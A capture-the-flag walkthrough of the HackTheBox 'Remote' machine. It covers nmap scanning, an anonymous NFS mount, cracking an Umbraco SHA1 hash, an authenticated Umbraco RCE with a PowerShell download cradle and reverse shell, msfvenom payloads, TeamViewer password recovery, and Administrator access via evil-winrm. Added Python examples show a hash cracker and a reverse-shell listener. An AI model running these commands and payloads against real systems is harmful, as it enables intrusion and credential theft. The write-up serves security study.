#reconnaissance
| nmap
As usual, I start with nmap.

kali@kali:~/Desktop/HTB/remote$ nmap -A -sV -sC -v -oN remote_nmap --min-rate=10000 10.10.10.180

About two minutes later the report is in:
```
# Nmap 7.80 scan initiated Tue Jul 21 16:29:50 2020 as: nmap -A -sV -sC -v -oN remote_nmap --min-rate=10000 10.10.10.180
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.064s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind      2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd       1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 5m08s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-21T20:35:54
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 21 16:31:56 2020 -- 1 IP address (1 host up) scanned in 125.40 seconds
```
Plenty of interesting things here: anonymous FTP, a web server, rpcbind with NFS/mountd behind it, and SMB. I start with port 80.

First, a hosts entry, mapping 10.10.10.180 to remote.htb: sudo vi /etc/hosts. Since this is needed on every box, a small alias saves typing:

```
{ echo "" ; echo "#alias for hosts" ; echo "alias hosts='sudo vi /etc/hosts'"; } >> ~/.bashrc
```
#enumeration
| web
Browsing remote.htb/contact turns up a few interesting things.

First, the footer identifies the CMS as Umbraco. Second, the button on the page most likely leads to a login page for the admin area.

I haven't found anything else interesting yet. Let's put this aside for now and pay attention to the rpcbind service from the nmap report.
| nfs
The rpcinfo output lists nfs and mountd, so the nfs-showmount NSE script should tell me what is exported:

kali@kali:~/Desktop/HTB/remote$ nmap -sV --script=nfs-showmount -oN remote.nfs --min-rate=10000 remote.htb

And I get a second nmap report (the many "filtered" ports are most likely probes dropped at this send rate, not real filtering; the line that matters is nfs-showmount):
```
# Nmap 7.80 scan initiated Tue Jul 21 18:53:20 2020 as: nmap -sV --script=nfs-showmount -oN remote.nfs --min-rate=10000 remote.htb
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.081s latency).
Not shown: 976 closed ports
PORT      STATE    SERVICE          VERSION
21/tcp    open     ftp              Microsoft ftpd
80/tcp    open     http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp   open     rpcbind          2-4 (RPC #100000)
| nfs-showmount:
|_  /site_backups
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open     msrpc            Microsoft Windows RPC
139/tcp   open     netbios-ssn      Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
514/tcp   filtered shell
992/tcp   filtered telnets
1066/tcp  filtered fpo-fns
1169/tcp  filtered tripwire
1434/tcp  filtered ms-sql-m
2049/tcp  open     mountd           1-3 (RPC #100005)
| nfs-showmount:
|_  /site_backups
3168/tcp  filtered poweronnud
3546/tcp  filtered unknown
3690/tcp  filtered svn
5033/tcp  filtered jtnetd-server
7625/tcp  filtered unknown
9010/tcp  filtered sdr
10000/tcp filtered snet-sensor-mgmt
10009/tcp filtered swdtp-sv
14238/tcp filtered unknown
32770/tcp filtered sometimes-rpc3
50003/tcp filtered unknown
61532/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 21 18:55:37 2020 -- 1 IP address (1 host up) scanned in 137.50 seconds
```
There is a site_backups export. Let's mount it:

kali@kali:~/Desktop/HTB/remote$ sudo mount -t nfs remote.htb:/site_backups /mnt

It mounts without any credentials, and the contents are the web root of an ASP.NET site:
```
kali@kali:~/Desktop/HTB/remote$ ls -la /mnt
total 159
drwx------  2 4294967294 4294967294  4096 Feb 23 13:35 .
drwxr-xr-x 19 root       root       36864 Jul 14 18:04 ..
drwx------  2 4294967294 4294967294    64 Feb 20 12:16 App_Browsers
drwx------  2 4294967294 4294967294  4096 Feb 20 12:17 App_Data
drwx------  2 4294967294 4294967294  4096 Feb 20 12:16 App_Plugins
drwx------  2 4294967294 4294967294    64 Feb 20 12:16 aspnet_client
drwx------  2 4294967294 4294967294 49152 Feb 20 12:16 bin
drwx------  2 4294967294 4294967294  8192 Feb 20 12:16 Config
drwx------  2 4294967294 4294967294    64 Feb 20 12:16 css
-rwx------  1 4294967294 4294967294   152 Nov  1  2018 default.aspx
-rwx------  1 4294967294 4294967294    89 Nov  1  2018 Global.asax
drwx------  2 4294967294 4294967294  4096 Feb 20 12:16 Media
drwx------  2 4294967294 4294967294    64 Feb 20 12:16 scripts
drwx------  2 4294967294 4294967294  8192 Feb 20 12:16 Umbraco
drwx------  2 4294967294 4294967294  4096 Feb 20 12:16 Umbraco_Client
drwx------  2 4294967294 4294967294  4096 Feb 20 12:16 Views
-rwx------  1 4294967294 4294967294 28539 Feb 20 00:57 Web.config
```

The owner uid 4294967294 is how an unmapped (anonymous) Windows NFS identity shows up on Linux. Don't let the rwx------ mode bits fool you: on NFS the permission check happens on the server, and this export evidently allows anonymous access, because the files are readable from an ordinary user account on the client.
A little reading on Umbraco shows that App_Data/Umbraco.sdf is the SQL Server Compact database behind the CMS, and it holds the CMS user table. Rather than open it properly, I pull the printable strings out of it and grep for the admin user:

kali@kali:/mnt/App_Data$ strings Umbraco.sdf | grep admin

The output contains the admin user's record, including the password hash and the algorithm Umbraco used for it:
```
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
```
The 40 hex characters are the hash and the passwordConfig JSON says unsalted SHA1, so this is a Raw-SHA1 hash. I save the hex string to hash.txt and crack it with john (add --format=Raw-SHA1 if john does not pick the format itself):
```
kali@kali:~/Desktop/HTB/remote$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
...
kali@kali:~/Desktop/HTB/remote$ sudo john hash.txt --show
?:baconandcheese

1 password hash cracked, 0 left
```
Now I have a credential: admin@htb.local / baconandcheese.
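Here is what john is doing with that line, as an added Python example (not from the writeup or from any tool used in it): parse the strings output for the 40-character hex hash and the algorithm name from Umbraco's passwordConfig JSON, then hash candidate words and compare. The row is copied from the output above; the wordlist is a constructed stand-in for rockyou.txt. Only unsalted hex hashes like this one are handled; Umbraco's salted HMAC formats would need a different routine.

```python
# Added example (not from the writeup): recover the admin hash from the
# `strings Umbraco.sdf | grep admin` output and check candidate passwords
# offline, the way john/hashcat do. Standard library only.
import hashlib
import re

# The line strings(1) printed for the admin row on this box (copied from the
# writeup). strings prints the record's fields back to back, which is why the
# username "admin" runs straight into the e-mail address.
ADMIN_ROW = ('adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa'
             '{"hashAlgorithm":"SHA1"}admin@htb.localen-US'
             'feb1a998-d3bf-406a-b30b-e269d7abdf50')

# A 40-hex-digit value immediately followed by Umbraco's passwordConfig JSON.
HASH_RE = re.compile(r'(?P<hash>[0-9a-f]{40})\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9]+)"\}')

# passwordConfig names -> hashlib constructor names (unsalted hex digests only;
# Umbraco's salted HMAC formats, base64 salt + base64 hash, are not handled).
ALGORITHMS = {"SHA1": "sha1", "SHA256": "sha256", "MD5": "md5"}


def parse_umbraco_row(row: str):
    """Return (hex_hash, algorithm_name) from one strings(1) line, or None."""
    m = HASH_RE.search(row)
    if not m:
        return None
    return m.group("hash"), m.group("alg")


def hash_candidate(password: str, algorithm: str) -> str:
    """Hash a candidate the way an unsalted Umbraco hex hash was produced."""
    return hashlib.new(ALGORITHMS[algorithm], password.encode("utf-8")).hexdigest()


def crack(hex_hash: str, algorithm: str, wordlist):
    """Dictionary attack: return the first word whose hash matches, else None."""
    target = hex_hash.lower()
    for word in wordlist:
        word = word.rstrip("\r\n")          # tolerate lines read straight from a file
        if hash_candidate(word, algorithm) == target:
            return word
    return None


# Constructed stand-in for rockyou.txt so the example runs offline.
SAMPLE_WORDLIST = ["password", "admin", "baconandcheese", "Welcome1"]

if __name__ == "__main__":
    parsed = parse_umbraco_row(ADMIN_ROW)
    print("hash/alg :", parsed)
    print("cracked  :", crack(parsed[0], parsed[1], SAMPLE_WORDLIST))
```

To run it against the real wordlist, pass `open("/usr/share/wordlists/rockyou.txt", errors="ignore")` as the wordlist; the function reads it line by line.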
#exploitation
| umbraco-rce
While reading up on Umbraco I also found a CVE for it: an authenticated remote code execution, with a public exploit script. With the admin credentials in hand it is time to use it. I download the exploit plus a small PowerShell reverse shell:

```
wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
wget https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1
chmod 775 exploit.py
```
Start msfconsole in one terminal and set up a handler for a 64-bit Windows reverse shell, as a background job that keeps listening after the first session arrives:

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload payload/windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.19.30
msf5 exploit(multi/handler) > set ExitOnSession false
msf5 exploit(multi/handler) > exploit -j
```

Here 10.10.19.30 is my attacking machine's IP; LPORT stays at the default 4444, which is the port mini-reverse.ps1 will connect to.
The reverse-shell script has to be fetched over HTTP, so in a second terminal I serve the working directory:

kali@kali:~/Desktop/HTB/remote$ sudo python3 -m http.server 80

mini-reverse.ps1 needs my IP and the handler's port:

$socket = new-object System.Net.Sockets.TcpClient('10.10.19.30', 4444);

In a third terminal I run the exploit. The command it executes on the box is powershell.exe with a download cradle that fetches mini-reverse.ps1 and runs it in memory:

kali@kali:~/Desktop/HTB/remote$ sudo python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.19.30/mini-reverse.ps1')"
Once this runs, a session lands in msfconsole. The shell runs as the IIS application pool identity, and user.txt is readable from it:

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               10.10.19.30:4444 -> 10.10.10.180:49758 (10.10.10.180)

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

whoami
iis apppool\defaultapppool
type c:\users\Public\user.txt
e15b9fd6e3d84aa519946424f7bf9bf9
```
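What multi/handler is doing with a shell_reverse_tcp payload is worth seeing without the framework. The Python below is an added example, not part of the writeup or of any tool used in it: a listener that catches one reverse shell and drives cmd.exe non-interactively, using an end-of-output marker so it knows where each command's output stops, plus a constructed fake cmd.exe that connects back so the whole exchange runs on localhost. The hostname REMOTE and the app-pool identity are taken from the session output on this page; everything else is made up for the demo.

```python
# Added example (not from the writeup): a bare-bones stand-in for
# exploit/multi/handler with a shell_reverse_tcp payload. The "shell" session
# above is nothing more than a TCP socket with cmd.exe's stdin/stdout behind it,
# so any listener that accepts the connection and relays bytes can drive it.
# This one runs commands non-interactively and collects each command's output,
# which is what scripted post-exploitation needs. fake_cmd_exe() is a constructed
# victim that connects back the way the real shell would, so the exchange runs
# on localhost.
import socket
import threading

MARKER = "__END_OF_CMD__"                      # token cmd.exe echoes after every command
PROMPT = "C:\\windows\\system32\\inetsrv>"     # prompt seen in the real session


def start_listener(host="127.0.0.1", port=0):
    """Bind the catcher. port=0 lets the OS choose; read it back with getsockname()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def _recv_until_marker(conn, buf):
    """Read until a line that is exactly MARKER arrives; return (body, leftover)."""
    needle = f"\n{MARKER}\r\n".encode()        # line start + marker, not the echoed 'echo MARKER'
    while needle not in buf:
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("shell closed before the marker arrived")
        buf += chunk
    body, _, rest = buf.partition(needle)
    return body, rest


def catch_one(srv, commands, timeout=10.0):
    """Accept one reverse shell, run each command on it, return {command: output}.

    Each command is sent as '<cmd> & echo MARKER'. cmd.exe runs the echo whether
    or not the command succeeded, so the marker line reliably ends the output.
    cmd.exe also echoes the command line it reads when stdin is not a console,
    so everything up to and including that echoed line is discarded.
    """
    srv.settimeout(timeout)
    conn, _peer = srv.accept()
    conn.settimeout(timeout)
    results, buf = {}, b""
    with conn:
        for cmd in commands:
            conn.sendall(f"{cmd} & echo {MARKER}\r\n".encode())
            body, buf = _recv_until_marker(conn, buf)
            lines = body.decode(errors="replace").split("\r\n")
            echoed = max((i for i, l in enumerate(lines) if f"echo {MARKER}" in l), default=-1)
            results[cmd] = "\r\n".join(lines[echoed + 1:]).strip()
    return results


def fake_cmd_exe(host, port, canned):
    """Constructed victim: connect back and behave like cmd.exe with redirected
    stdin (print a prompt, echo each command line, then its output)."""
    try:
        with socket.create_connection((host, port), timeout=10.0) as s:
            s.sendall(b"Microsoft Windows (fake banner for this example)\r\n\r\n" + PROMPT.encode())
            buf = b""
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    return
                buf += chunk
                while b"\r\n" in buf:
                    line, buf = buf.split(b"\r\n", 1)
                    text = line.decode()
                    cmd = text.split(" & echo ")[0]
                    out = canned.get(cmd, f"'{cmd}' is not recognized as an internal or external "
                                          f"command,\r\noperable program or batch file.")
                    s.sendall(f"{text}\r\n{out}\r\n{MARKER}\r\n{PROMPT}".encode())
    except OSError:
        return   # the listener closed the session; nothing more to do


def demo():
    """Run the full exchange on localhost and return what the listener collected."""
    srv = start_listener()
    host, port = srv.getsockname()
    canned = {"whoami": "iis apppool\\defaultapppool", "hostname": "REMOTE"}
    victim = threading.Thread(target=fake_cmd_exe, args=(host, port, canned), daemon=True)
    victim.start()
    try:
        return catch_one(srv, ["whoami", "hostname", "nosuchcmd"])
    finally:
        srv.close()


if __name__ == "__main__":
    for cmd, out in demo().items():
        print(f"{cmd!r} -> {out!r}")
```

Against a real target you would call start_listener("0.0.0.0", 4444) and catch_one() with your own command list; the marker trick is the same one automation frameworks use to turn a raw cmd.exe stream into discrete command results.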
#privilege escalation

Let's download winPEAS for enumeration,

kali@kali:~/Desktop/HTB/remote$ wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe

and generate a meterpreter payload for more comfortable work:

kali@kali:~/Desktop/HTB/remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.30 LPORT=4444 -f exe > meterpreter.exe

Both files sit in the directory the python http.server from earlier is serving, so I pull them onto the box from the shell session in msfconsole:

```
powershell Invoke-WebRequest -URI http://10.10.19.30/winPEAS.exe -outfile C:\Users\Public\winPEAS.exe
powershell Invoke-WebRequest -URI http://10.10.19.30/meterpreter.exe -outfile C:\Users\Public\meterpreter.exe
```
Now I reconfigure the handler for meterpreter (the handler's payload has to match what msfvenom produced, so here it is the 32-bit windows/meterpreter/reverse_tcp). The first handler job is still bound to port 4444, so stop it with jobs -K before starting the new one; then launch C:\Users\Public\meterpreter.exe from the existing shell and drop into a shell from the new meterpreter session:

```
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.19.30
msf5 exploit(multi/handler) > exploit
meterpreter > shell
```

and start winPEAS.

C:\windows\system32\inetsrv> C:/Users/Public/winPEAS.exe
| teamviewer
winPEAS's output contains this tasty gift:

```
=================================================================================================
TeamViewer7(TeamViewer GmbH - TeamViewer 7)["C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"] - Auto - Running
    TeamViewer Remote Software
=================================================================================================
```
TeamViewer 7 keeps its passwords in the registry, AES-encrypted with a key and IV that are the same on every install, and Metasploit's post module knows how to recover them. Back out of the shell into meterpreter and run it:

```
C:\windows\system32\inetsrv>exit
exit
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
```
The unattended-access password turns out to be reused for the local Administrator account, so the last step is evil-winrm and root.txt:

```
kali@kali:~/Desktop/HTB/remote$ evil-winrm -u Administrator -p '!R3m0te!' -i 10.10.10.180

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\Users\Administrator\Desktop\root.txt
61adf694bd7966ae13050b988e91c585
```